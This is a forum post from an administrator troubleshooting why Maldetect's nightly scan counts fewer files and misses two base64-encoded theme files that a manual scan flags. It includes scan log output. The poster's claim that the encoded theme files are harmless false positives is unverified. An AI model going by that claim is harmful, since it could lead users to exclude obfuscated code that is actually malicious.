Maldetect is not scanning all users files on the nightly scan!!
A virus program in Wordpress detected a virus and I got a mail about it. Now I wondered why Maldetect did not notice it and investigated.
Now this happens on a nightly scan
watch the number of files:
Jan 21 03:34:40 server18 maldet(11048): {scan} found ClamAV clamscan binary, using as scanner engine...
Jan 21 03:34:40 server18 maldet(11048): {scan} scan of /home*/*/domains/*/public_html (7451 files) in progress...
Jan 21 03:34:49 server18 maldet(11048): {scan} scan completed on /home*/*/domains/*/public_html: files 7451, malware hits 0, cleaned hits 0
Seems oke, no malware hits found.
But I did not trust it and did a manual Maldetect scan just to be sure and look what happens
look again at the number of files:
maldet(9726): {scan} signatures loaded: 13714 (11813 MD5 / 1901 HEX)
maldet(9726): {scan} building file list for /home/user/domains/userdomain.nl/public_html/, this might take awhile...
maldet(9726): {scan} file list completed, found 6737 files...
maldet(9726): {scan} found ClamAV clamscan binary, using as scanner engine...
maldet(9726): {scan} scan of /home/user/domains/userdomain.nl/public_html/ (6737 files) in progress...
maldet(9726): {scan} processing scan results for hits: 2 hits 0 cleaned
maldet(9726): {scan} scan completed on /home/user/domains/userdomain.nl/public_html/: files 6737, malware hits 2, cleaned hits 0
maldet(9726): {scan} scan report saved, to view run: maldet --report 012115-1537.9726
This is the result in the email I got from the manual scan:
{HEX}gzbase64.inject.unclassed.15 : /home/user/domains/userdomain.nl/public_html/footer.php
Same goes for functions.php.
As you can see there are 2 issues now, but in fact there are 3 issues.
1.) There IS malware found, which is indeed present in 2 files on that domain which was not found on the automatic scan.
2.) A manual scan finds 6737 files in my domain only, but on the server scan it says there are only 7451 files present? This can't be true, because I'm sure of a couple of domains which have minimum over 3000 files themselves. So the real amount of files should be lots more.
And with this test it has nothting to do with depth, because I placed those to "infected" files in my public_html folder, so the automatic (cronjob) scan should have found them in any case.
3.) There are 2 files, named functions.php and footer.php which come from a free wordpress theme. After some investigations it seems that ALL free themes coming from
http://www.freewordpressthemes4u.com/ are encrypted in base64 and Maldetect sees them as malware infected. In fact these are false positives.
I wrote an email about this to the creators of Maldetect, but until now (7 days later) no answer yet and I don't expect to get any answer either.
So I got 2 questions now.
A.) The major problem is ofcourse issue 1 and 2. How can this be fixed so automatic scan detects the same what manual scan is detecting?
B.) As far as I could see there is no possibility to exclude specific files from scanning. There will be more users making use of these free Wordpress themes, because they are nice, and lots of them will not go and try do decrypt them, so all Maldetect users will encounter this issue eventually.
Is there a way to avoid these false positives in the future, so users can use these free themes, which are in fact not infected?